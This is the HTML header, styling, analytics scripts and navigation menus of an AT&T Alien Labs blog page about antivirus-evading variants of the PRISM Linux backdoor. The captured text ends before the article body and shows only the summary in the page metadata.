<!DOCTYPE html>
<html lang="en">

<head>
	

	


	

	<!--trying to figure out the canonical url issue with blogs-->
	<link rel="canonical" href="https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar" />

	<title>PRISM attacks fly under the radar | AT&T Alien Labs</title>

	

		

	<meta property="og:site_name" value="AT&T Cybersecurity" />
	<meta property="og:title" content="PRISM attacks fly under the radar" />
	<meta property="og:url" content="https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar" />
	<meta property="og:image" content="https://cdn-cybersecurity.att.com/blog-content/Blog-Images/open-graph/malware_og.jpg" />
	<meta property="og:description" content="Executive summary

AT&amp;T Alien Labs has recently discovered a cluster of Linux ELF executables that have low or zero anti-virus detections in VirusTotal (see example in figure 1), though our internal threat analysis systems have flagged them as malicious. &nbsp;Upon inspection of the samples, Alien Labs has identified them as modifications of the open-source PRISM backdoor used by multiple threat actors in various campaigns.

We have conducted further investigation of the samples and discover" />
		

		<script type="text/javascript" src="https://platform-api.sharethis.com/js/sharethis.js#property=619c04ec1bd25500123c9511&product=inline-share-buttons" async="async"></script>

	<meta charset="utf-8">

<link rel="preconnect" href="https://cdn-cybersecurity.att.com" />
<link rel="preconnect" href="https://www.att.com" />
<link rel="preconnect" href="https://www.googletagmanager.com" crossorigin />
<link rel="preconnect" href="https://cdn.vidyard.com" crossorigin />
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin />
<link rel="preconnect" href="https://www.google-analytics.com" crossorigin />
<link rel="preconnect" href="https://play.vidyard.com" crossorigin />
<link rel="preconnect" href="https://adservice.google.com" crossorigin />
<link rel="preconnect" href="https://www.facebook.com" crossorigin />
<link rel="preconnect" href="https://www.google.com" crossorigin />
<link rel="preconnect" href="https://px.ads.linkedin.com" crossorigin />


<style>.async-hide { opacity: 0 !important} </style>
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
    h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
    (a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
    {'GTM-WGVFC3T':true});</script>
<link rel="preload" href="https://www.googleoptimize.com/optimize.js?id=GTM-WGVFC3T" as="script">
<script async src="https://www.googleoptimize.com/optimize.js?id=GTM-WGVFC3T"></script>


<script src="https://cdn-cybersecurity.att.com/js/v2/imports/top-bundle.min.js?v=20211221850047"></script>


<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataDefinition.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataManager.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/marketing.min.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/detm_adobe.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/engage.min.js" as="script">






<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KLJDXJN');</script>
<!-- End Google Tag Manager -->
<script src='https://www.att.com/scripts/adobe/prod/detm-container-hdr.js' data-restrictions='target' type='text/javascript'></script>


<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="ahrefs-site-verification" content="a6fa0378625f72f89c6f290c3c7559ffee326fb9232cd87fcace798afce3e30d">
<meta name="google-site-verification" content="GTQZz4AGa47UtmP64oC5BB735pkyncjtISHOcQZbIho" />
<meta name="google-site-verification" content="dOSpKecfL6OVRkgr2KvddmhD-l-g3x8vlru1kmbqa9M" />

<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/zero-width.ttf" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Bold.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Regular.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Light.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Medium.woff2" />


<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-LightItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-BoldItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-MediumItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Italic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Black.woff2" />

<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/css/fonts/glyphicons-halflings-regular.woff2" />
<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/av-icons.ttf?e81fxl" />



<link rel="preload" as="style" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20211221850047" />
<link rel="apple-touch-icon" sizes="144x144" href="https://cdn-cybersecurity.att.com/images/uploads/apple-touch-icon.png"/>
<link rel="icon" type="image/png" sizes="32x32" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico"/>
<link rel="shortcut icon" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico">
<link rel="manifest" href="https://cdn-cybersecurity.att.com/manifest.json">

<link rel="stylesheet" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20211221850047" />








<script>
	var customAdobeTrackingPageLoadObj = {};
	if (typeof ddo !== "undefined") {initAdobePageTrackingHeader();}
	function adobeVideoCommenceVidyard(player) {
		var commenceEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: player.metadata.length_in_seconds
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Commence', commenceEvent);
		}
	}
	function adobeVideoUpdateVidyard(player) {
		var updateEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: player.metadata.length_in_seconds,
			videoLengthViewed: Math.floor(player.status.currentTime),
			videoProgressPercent: Math.ceil((player.status.currentTime / player.metadata.length_in_seconds) * 100)
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Update', updateEvent);
		}
	}

	function initAdobePageTrackingHeader() {
		ddo.disableAutoPageLoad();
		document.addEventListener('click', function (event) {
			var target = event.target;
			if (!target.href || !target.text) { return true; }
			var linkEvent = {
				slotFriendlyName: "link-click",
				contentFriendlyName: "Link Click",
				mediaCategory: "Security"
			};
			linkEvent.linkName = target.text;
			linkEvent.linkDestinationUrl = target.href;
			if (target.href.indexOf('#watch-') >= 0) {
				linkEvent.slotFriendlyName = 'watch-video';
				linkEvent.contentFriendlyName = 'Watch Video';
				linkEvent.linkName = 'Watch Video';
			}
			ddo.pushEvent("linkClick", "Link_Click", linkEvent);
		});
		
		customAdobeTrackingPageLoadObj['page.location.url'] = '/blogs/labs-research/prism-attacks-fly-under-the-radar';


		
		
		    customAdobeTrackingPageLoadObj['page.category.siteSubSection1'] = 'blogs';
		


		
		
			customAdobeTrackingPageLoadObj['page.category.siteSubSection2'] = 'labs-research';
		



		
		
			customAdobeTrackingPageLoadObj['page.category.siteSubSection3'] = 'prism-attacks-fly-under-the-radar';
		


		
		

		
		


		
			customAdobeTrackingPageLoadObj['page.media.objective'] = 'Awareness';
		

		
	}
</script>


<script type="text/javascript">
    var _elqQ = _elqQ || [];
    _elqQ.push(['elqSetSiteId', '1086385399']);

    _elqQ.push(['elqUseFirstPartyCookie', 'cyber-tracking.att.com']);

    _elqQ.push(['elqTrackPageView', window.location.href]);

    (function () {
        function async_load() {
            var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true;
            s.src = '//img03.en25.com/i/elqCfg.min.js';
            var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x);
        }
        if (window.addEventListener) window.addEventListener('DOMContentLoaded', async_load, false);
        else if (window.attachEvent) window.attachEvent('onload', async_load);
    })();
</script>


	<link rel="alternate" type="application/rss+xml" title="AlienVault Open Threat Exchange Blog" href="/site/blog-all-rss" />

	<style>
	
	
	.section-breadcrumb ol {
    margin-top: 0px !important;
    margin-bottom: 10px;
	}
	
	.flexible-layout .section-breadcrumb ol li a,
	.flexible-layout .section-breadcrumb ol li{
    	color: #000;
    	font-size: 12px;
	}
	
	.section-breadcrumb .glyphicon {
    font-size: 10px;
    line-height: 10px;
    font-weight: 300;
    color: #000!important;
	}

	.blog-author-info {
		width: 70%;
		float: left;
		color: #191919;
	}

	.blog-subscribe-grid ul {
		margin-left: 0px;
		margin-bottom: 0px;
		padding-left: 0px;
	}

	.blog-subscribe-grid ul li {
		list-style-type: none;
		line-height: 20px;
	}

	.blog-subscribe-grid ul li a {
		color: #c6ced5;
		font-size: 14px;
		text-decoration: none;
	}

	.blog-subscribe-grid ul li a:hover {
		text-decoration: underline;
	}

	.blog-content-area img {
		width: 100%!important;
		height: auto!important;
	}

	.blog-promo-item {
		clear: both;
		overflow: hidden;
		margin-bottom: 30px;
	}
	.promo-block .small {
		text-transform: uppercase;
	}

	.blog-promo-item-text {
		width: 345px;
		float: left;
		max-width:100%;
	}

	.blog-promo-item p {
		margin-bottom: 0px!important;
	}






	#blog-promo-block {
		padding-top: 20px;
	}



	/*promo block and sticky classes*/

	.sticky-sidebar {
		top: 147px;
		position: -webkit-sticky; /* Safari */
		position: sticky;
	}
	     .sidebar-search {
			 margin-bottom: 30px;
		 }

         .sidebar-search .search-button {
                width: 100%;
                position: relative;
            }

            .sidebar-search .search-button input {
                padding: 0px;
                margin: 2px 0px 0px 0px;
                position: absolute;
                background: url(https://cdn-cybersecurity.att.com/images/icn-sidebar-search.png) top left no-repeat;
                background-size: 25px 25px;
                width: 25px;
                height: 25px;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                left: 10px;
                top: 6px;
             }

			.sidebar-search .search-field input {
                border: 0;
                width: 100%;
                height: 30px;
                padding-left: 50px;
				margin-top: 5px;
            }

            .sidebar-search .search-field {
                border: 1px solid #CCCCCC;
                width: 100%;
                height: 40px;
            }

            #q::placeholder {
          		color: #767676!important;
            }

            #blog-subscribe-box {
			height:auto;
            padding: 32px;
            background-image: url('https://cdn-cybersecurity.att.com/images/uploads/backgrounds/blog-email-subscribe-bkg.jpg');
            background-size: cover;
            }

            #blog-subscribe-box h2 {
            color: #fff;
            font-size:32px;
            }

			#blog-subscribe-box p {
				margin-bottom: 10px;
			}






	@media (max-width: 991px) {
            .sidebar-search .search-button input {
                padding: 0px;
                background: transparent;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                right: 5px;
                top: 5px;
                padding-left: 0px;
             }

            .sidebar-search .search-field input {
             padding-left: 15px;
             }


            }

            	@media (min-width: 768px) and (max-width: 920px){
	.blog-subscribe-grid .btn {
		border-radius: 24px;
	    font-size: 12px;
	    line-height: 18px;
	    border: none;
	    padding: 6px 36px;
	    height: 30px;
	    font-weight: 500;
	}
}


		.blog-content-area p,
		.blog-content-area ul li,
		.blog-content-area ol li{
			font-size: 16px;
			line-height: 20px;
			font-weight: 400;
		}
		.blog-content-area ul li,
		.blog-content-area ol li {
			margin-bottom: 10px;
		}
		
		.blog-content-area {
		margin-top: 30px;
		}
		
		.flexible-layout .section-breadcrumb {
		margin-bottom: 30px;
		}
		
		.blog-detail h1 {
    		color: #000; 
			background: transparent;
    		padding: 0px;
		}
		
		.blog-title-date-author-area {
			padding-bottom: 20px;
			border-bottom: #959595 1px solid;
		}
		
		.blog-body {
		padding-top: 20px;
		}
		
		
		.blog-detail .blog-categories {
    background-color: transparent;
    border-bottom: 1px solid #959595;
    border-top: 1px solid #959595;
    padding: 20px 0px 20px 0px;
    color: #000;
    margin: 30px 0px;
    font-size: 16px;
    line-height: 24px;
	font-weight: 400;
	}
	
	.blog-detail .blog-categories a {
	font-weight: 400;
	}
	
	.blog-share {
	margin-top: 60px;
	text-align: center;
	margin-bottom: 60px;
	}
	
	.blog-listing-social {
		display: block;
	}
	
	#st-1 .st-btn {
	  border-radius: 25px!important;
	  border: none;
	  cursor: pointer;
	  display: inline-block;
	  font-size: 12px;
	  height: 45px!important;
	  line-height: 40px!important;
	  margin-right: 8px;
	  padding: 0 10px;
	  position: relative;
	  text-align: center;
	  top: 0;
	  vertical-align: top;
	  white-space: nowrap;
	  margin-right: 20px!important;
	}
	
	#st-1 .st-btn > img {
	  display: inline-block;
	  height: 25px!important;
	  width: 25px!important;
	  position: relative;
	  top: 10px;
	  vertical-align: top;
	  }
	  
	  #st-1 .st-btn[data-network='email'] {
	  	background-color: #e0752d!important;
	  }
	  
	  .st-first {
	  	margin-left: 20px!important;
	  }
	
	</style>

</head>

	<body class="listing-blog-entry-id-7386">
			<!-- Google Tag Manager (noscript) -->
<noscript><iframe src='https://www.googletagmanager.com/ns.html?id=GTM-KLJDXJN'
height='0' width='0' style='display:none;visibility:hidden'></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<script src='https://www.att.com/scripts/adobe/prod/detm-container-ftr.js' type='text/javascript'></script>


		<header id="header" class="navbar navbar-fixed-top">

	<style>
@media (max-width: 543px) {
	.hide-on-mobile {
		display: none;
	}
}
</style>

<div id="news-banner">
    <div class="container-fluid">
        <div class="row vcenter">
            <div class="col-sm-12">

                <div id="news-headline-link">
					<a href="/products/strategy-and-roadmap/sase-readiness" class="text-white">
						Start your SASE readiness consultation today.
						<span class="hide-on-mobile">Learn more</span> &LongRightArrow;
					</a>
                </div>
				<div id="search-contact">
					<ul class="list-unstyled header_nav_top_list">
						<li class="header_nav_top_list_item"><a id="top-nav-support" href="/support">Support</a></li>
						<li class="header_nav_top_list_item"><a id="top-nav-contact" href="/contact">Contact</a></li>
						<li class="header_nav_top_list_item search">
							<form action="/search-results" method="get" id="top-search-form" __bizdiag="113" __biza="WJ__"><input name="q" id="top-search-form-text" type="text" placeholder="Search" aria-label="Search"><button type="submit"><span class="glyphicon glyphicon-search"></span></button></form>

						</li>
					</ul>
				</div>
            </div>
        </div>
    </div>
</div>






	<div id="header-container" class="container-fluid">
		<div id="header-logo">
			<div class="logo-globe"><a href="https://business.att.com" target="_blank"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-globe.svg" alt="AT&amp;T Business" /></a></div>
			<div class="att-business"><a href="https://business.att.com" target="_blank"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-business-web.svg" alt="AT&amp;T Business" /></a></div>
			<div class="att-cybersecurity"><a href="/"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-cybersecurity-web.svg" alt="AT&amp;T Cybersecurity" /></a></div>
		</div>

		<button type="button" class="header_toggle_nav navbar-toggle collapsed" data-toggle="collapse" data-target="#header-nav" aria-expanded="false">
			<span class="sr-only">Toggle navigation</span>
			<span class="avicon avicon-bars"></span>
			<span class="avicon avicon-close"></span>
		</button>
		
		
			<a href="/contact" id="header-cta" class="hidden-md hidden-lg btn btn-blue btn-sm">Contact us</a>
		

		<nav class="navbar-collapse collapse" id="header-nav">
			<ul class="nav navbar-nav list-unstyled">
				<li class="nav-item mobile-search visible-sm visible-xs">
					<form action="/search-results" method="get" id="mobile-search-form" __bizdiag="113" __biza="WJ__"><input name="q" id="mobile-search-form-text" type="text" placeholder="Search" aria-label="Search"><button class="sr-only" type="submit">Search</button></form>
				</li>
				<li class="nav-item has-dd products">
					<a id="main-nav-products" href="/products" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#products-dd">Products<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span>
					</a>
					<div class="nav-dropdown collapse" id="products-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav">
									<li id="first-sub-cyber-strategy-risk"><a href="/categories/cybersecurity-consulting-services" class="first-level">Cybersecurity Consulting Services</a>
										<div class="desktop-subnav open">
											<ul class="list-unstyled">
												<li class="second-sub-heading">Cyber Strategy</li>
												<li class="second-sub-link"><a href="/products/strategy-and-roadmap">Strategy and Roadmap Planning</a></li>

												<li class="second-sub-link"><a href="/products/security-assessment">Enterprise Security Assessment Services</a></li>
												<li class="second-sub-link"><a href="/products/risk-based-cyber-posture-assessment">Risk-based Cyber Posture Assessment</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">Risk and Compliance</li>
												<li class="second-sub-link"><a href="/products/security-compliance">Security Compliance</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">Vulnerability and Threat Management</li>
												<li class="second-sub-link"><a href="/products/managed-vulnerability-program">Managed Vulnerability Program</a></li>
												<li class="second-sub-link"><a href="/products/penetration-testing-services">Penetration Testing</a></li>
												<li class="second-sub-link"><a href="/products/adversary-simulation-service">Adversary Simulation Services</a></li>
												<li class="second-sub-link"><a href="/products/incident-response">Incident Response Services</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">CSO Advisory Services</li>
												<li class="second-sub-link"><a href="/products/cybersecurity-iq-training">Cybersecurity IQ Training</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
												<li class="second-sub-link"><a href="/products/strategy-and-roadmap">Strategy and Roadmap Planning</a></li>
												<li class="second-sub-link"><a href="/products/security-assessment">Enterprise Security Assessment Services</a></li>
												<li class="second-sub-link"><a href="/products/risk-based-cyber-posture-assessment">Risk-based Cyber Posture Assessment</a></li>

												<li class="second-sub-link"><a href="/products/security-compliance">Security Compliance</a></li>

												<li class="second-sub-link"><a href="/products/managed-vulnerability-program">Managed Vulnerability Program</a></li>

												<li class="second-sub-link"><a href="/products/penetration-testing-services">Penetration Testing</a></li>
												<li class="second-sub-link"><a href="/products/adversary-simulation-service">Adversary Simulation Services</a></li>
												<li class="second-sub-link"><a href="/products/incident-response">Incident Response Services</a></li>
												<li class="second-sub-link"><a href="/products/cybersecurity-iq-training">Cybersecurity IQ Training</a></li>
											</ul>
										</div>
									</li>
                                    <li id="first-sub-managed-security-services"><a href="/categories/managed-security-services" class="first-level">Managed Security Services</a>
                                        <div class="desktop-subnav">
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Network Security</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-branch-with-fortinet">SASE Branch with Fortinet</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-with-cisco">SASE with Cisco</a></li>
												<li class="second-sub-link"><a href="/products/sase-with-palo-alto-networks">SASE with Palo Alto Networks</a></li>
                                                <li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
                                                <li class="second-sub-link"><a href="/categories/network-security">View All</a></li>
                                            </ul>
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Threat Detection</li>
                                                <li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
                                            </ul>
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Endpoint Security</li>
                                                <li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
                                                <li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
                                                <li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
                                            </ul>

                                        </div>
                                        <div class="mobile-subnav">
                                            <ul class="list-unstyled sub-nav">
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-branch-with-fortinet">SASE Branch with Fortinet</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-with-cisco">SASE with Cisco</a></li>
												<li class="second-sub-link"><a href="/products/sase-with-palo-alto-networks">SASE with Palo Alto Networks</a></li>
                                                <li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
                                                <li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
                                                <li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
                                                <li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
                                                <li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
                                            </ul>
                                        </div>
                                    </li>
									<li id="first-sub-network-security"><a href="/categories/network-security" class="first-level">Network Security</a>
										<div class="desktop-subnav">
											<ul class="list-unstyled">
												<li class="second-sub-heading">AT&T Trusted Internet Access</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
												<li class="second-sub-link"><a href="/products/network-based-firewall">Network Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall">Premises Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/enhanced-access-security">Enhanced Cybersecurity Services</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">AT&T Infrastructure and Application Protection</li>
												<li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
												<li class="second-sub-link"><a href="/products/application-layer-security">AT&T Application Layer Security</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
												<li class="second-sub-heading">AT&T Trusted Internet Access</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
												<li class="second-sub-link"><a href="/products/network-based-firewall">Network Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall">Premises Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/enhanced-access-security">Enhanced Cybersecurity Services</a></li>

												<li class="second-sub-heading">AT&T Infrastructure and Application Protection</li>
												<li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
												<li class="second-sub-link"><a href="/products/application-layer-security">AT&T Application Layer Security</a></li>
											</ul>
										</div>
									</li>
									<li id="first-sub-unified-endpoint"><a href="/categories/endpoint-security" class="first-level">Endpoint Security</a>
										<div class="desktop-subnav">
											<ul class="list-unstyled">
												<li class="second-sub-heading">Endpoint Security</li>
												<li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
												<li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
												<li class="second-sub-link"><a href="/products/vmware">VMware Workspace ONE®</a></li>
												<li class="second-sub-link"><a href="/products/ibm-maas360">IBM MaaS360</a></li>
												<li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
												<li class="second-sub-link"><a href="/products/mcafee-endpoint-protection">McAfee Endpoint Protection</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
													<li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
													<li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
													<li class="second-sub-link"><a href="/products/vmware">VMware Workspace ONE®</a></li>
													<li class="second-sub-link"><a href="/products/ibm-maas360">IBM MaaS360</a></li>
													<li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
													<li class="second-sub-link"><a href="/products/mcafee-endpoint-protection">McAfee Endpoint Protection</a></li>
											</ul>
										</div>
									</li>
									<li id="first-sub-threat-detection-response"><a href="/categories/threat-detection-and-response" class="first-level">Threat Detection and Response</a>
										<div class="desktop-subnav">

											<ul class="list-unstyled sub-nav">
												<li class="second-sub-heading">AT&T Threat Solutions</li>
												<li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
												<li class="second-sub-link"><a href="/products/threat-detection-and-responses-for-government">Threat Detection and Response for Government</a></li>
												<li class="second-sub-link"><a href="/products/usm-anywhere">USM Anywhere</a></li>
												<li class="second-sub-link"><a href="/products/usm-anywhere-advisors">USM Anywhere Advisors</a></li>
												<li class="second-sub-link"><a href="/products/usm-for-mssp">USM for MSSPs</a></li>
											</ul>

											<div id="products-tdr-menu-image">
												<a href="/alien-labs">
													<img src="https://cdn-cybersecurity.att.com/images/uploads/icons/alien-labs.svg" alt="">
													<p >Powered by<br>AT&amp;T Alien Labs</p>
												</a>
											</div>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">

												<li class="second-sub-heading">AT&T Threat Solutions</li>
												<li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
												<li class="second-sub-link"><a href="/products/threat-detection-and-responses-for-government">Threat Detection and Response for Government</a></li>

												<li class="second-sub-link"><a href="/products/usm-anywhere">USM Anywhere</a></li>
												<li class="second-sub-link"><a href="/products/usm-anywhere-advisors">USM Anywhere Advisors</a></li>
												<li class="second-sub-link"><a href="/products/usm-for-mssp">USM for MSSPs</a></li>

												</ul>
										</div>
									</li>

							</ul>
						</div>
						<!--<div class="dd-bottom visible-lg" id="view-all-products">
							<div class="container-fluid">
								<a href="/products">
									<span class="view-all-text">View All Products &LongRightArrow;</span>
								</a>
							</div>
						</div>-->
					</div>
				</li>
				<li class="nav-item has-dd solutions">
					<a id="main-nav-solutions" href="/solutions" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#solutions-dd">Solutions<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="solutions-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-see-all-solutions-mobile" href="/solutions" class="header_nav_link">See All Solutions</a></li>
							</ul>
							<div id="compliance">
								<div class="menu-header">Compliance</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/it-compliance-management">Overview</a></li>
									<li><a href="/solutions/gdpr-compliance">GDPR</a></li>
									<li><a href="/solutions/hipaa-compliance">HIPAA</a></li>
									<li><a href="/solutions/iso-27001-compliance">ISO 27001</a></li>
									<li><a href="/solutions/pci-dss-compliance">PCI DSS</a></li>
									<li><a href="/solutions/soc-2-compliance">SOC 2</a></li>
								</ul>
							</div>
							<div id="industry">
								<div class="menu-header">Industry</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/education">Education</a></li>
									<li><a href="/solutions/energy-sector-security">Energy Sector</a></li>
									<li><a href="/solutions/government">Federal</a></li>
									<li><a href="/solutions/financial-services">Financial Services</a></li>
									<li><a href="/solutions/healthcare">Healthcare</a></li>
									<li><a href="/solutions/manufacturing">Manufacturing</a></li>
									<li><a href="/partners/mssp-program">MSSPs</a></li>
									<li><a href="/solutions/retail">Retail</a></li>
								</ul>
							</div>
							<div id="environment">
								<div class="menu-header">Environment</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/5g-security-solutions">5G</a></li>
									<li><a href="/solutions/aws-security-and-compliance-management">AWS</a></li>
									<li><a href="/solutions/azure-security-and-compliance-management">Azure</a></li>
									<li><a href="/solutions/cloud-security">Cloud</a></li>
									<li><a href="/solutions/iot-and-mobility-security">IOT/Mobility</a></li>
									<li><a href="/solutions/hybrid-cloud-security">Hybrid</a></li>
									<li><a href="/solutions/network-security">Network</a></li>
									<li><a href="/solutions/remote-workforce-security">Remote Workforce</a></li>

								</ul>
							</div>
							<div id="core-capabilities">
								<div class="menu-header">Security Use Cases</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/intrusion-detection-system">Intrusion Detection</a></li>
									<li><a href="/solutions/secure-access-service-edge">Secure Access Service Edge</a></li>
									<li><a href="/solutions/secure-web-gateway">Secure Web Gateway</a></li>
									<li><a href="/solutions/siem-platform-solutions ">SIEM Platform Solutions</a></li>
									<li><a href="/solutions/extended-detection-and-response">XDR</a></li>
									<li><a href="/solutions/zero-trust-architecture">Zero Trust Architecture</a></li>

								</ul>
							</div>
						</div>
						<div class="dd-bottom visible-md visible-lg" id="view-all-solutions">
							<div class="container-fluid">
								<a href="/solutions">
									<span class="view-all-text">View All Solutions &LongRightArrow;</span>
								</a>
							</div>
						</div>
					</div>
				</li>
				<li class="nav-item has-dd partners">
